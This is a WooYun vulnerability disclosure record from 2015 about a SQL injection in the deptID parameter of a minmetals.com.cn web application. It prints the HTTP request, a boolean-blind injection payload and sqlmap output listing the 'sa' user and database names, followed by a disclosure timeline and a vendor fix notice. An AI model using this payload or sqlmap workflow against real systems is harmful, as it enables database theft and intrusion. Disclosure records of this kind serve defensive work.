乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-19: 细节已通知厂商并且等待厂商处理中 2015-11-20: 厂商已经确认,细节仅向厂商公开 2015-11-30: 细节向核心白帽子及相关领域专家公开 2015-12-10: 细节向普通白帽子公开 2015-12-20: 细节向实习白帽子公开 2015-12-25: 厂商已经修复漏洞并主动公开,细节向公众公开
cmncu.minmetals.com.cn参数deptIDsa权限可以执行执行命令 种植木马 从而内网渗透
GET /copper/access.do?deptID=1&method=testUserNameInDept&userName=e HTTP/1.1X-Requested-With: XMLHttpRequestReferer: http://cmncu.minmetals.com.cnCookie: JSESSIONID=06CC83DCF2449052416FA78144E25D83Host: cmncu.minmetals.com.cnConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */* sqlmap resumed the following injection point(s) from stored session:---Parameter: deptID (GET) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause Payload: deptID=-3287 OR 1375=1375-- jrlc&method=testUserNameInDept&userName=e---[04:34:35] [INFO] testing Microsoft SQL Server[04:34:35] [INFO] confirming Microsoft SQL Server[04:34:35] [INFO] the back-end DBMS is Microsoft SQL Serverweb application technology: Servlet 2.4, Tomcat 4.2.3.back-end DBMS: Microsoft SQL Server 2012[04:34:35] [INFO] fetching current user[04:34:35] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval[04:34:35] [INFO] retrieved: sacurrent user: 'sa'[04:34:40] [INFO] fetching database names[04:34:40] [INFO] fetching number of databases[04:34:40] [INFO] resumed: 14[04:34:40] [INFO] resumed: copper[04:34:40] [INFO] resumed: copper_test[04:34:40] [INFO] resumed: cu[04:34:40] [INFO] resumed: cunm[04:34:40] [INFO] resumed: KinmetFutures[04:34:40] [INFO] resumed: master[04:34:40] [INFO] resumed: model[04:34:40] [INFO] resumed: msdb[04:34:40] [INFO] resumed: Northwind[04:34:40] [INFO] resumed: pubs[04:34:40] [INFO] resumed: tempdb[04:34:40] [INFO] resumed: tin[04:34:40] [INFO] resumed: tin_test[04:34:40] [INFO] resumed: wxcopper_kfavailable databases [14]:[*] copper[*] copper_test[*] cu[*] cunm[*] KinmetFutures[*] master[*] model[*] msdb[*] Northwind[*] pubs[*] tempdb[*] tin[*] tin_test[*] wxcopper_kf
危害等级:高
漏洞Rank:10
确认时间:2015-11-20 15:34
感谢白帽子,漏洞正在处理.
2015-11-23:漏洞已修复
2015-12-25:漏洞已修复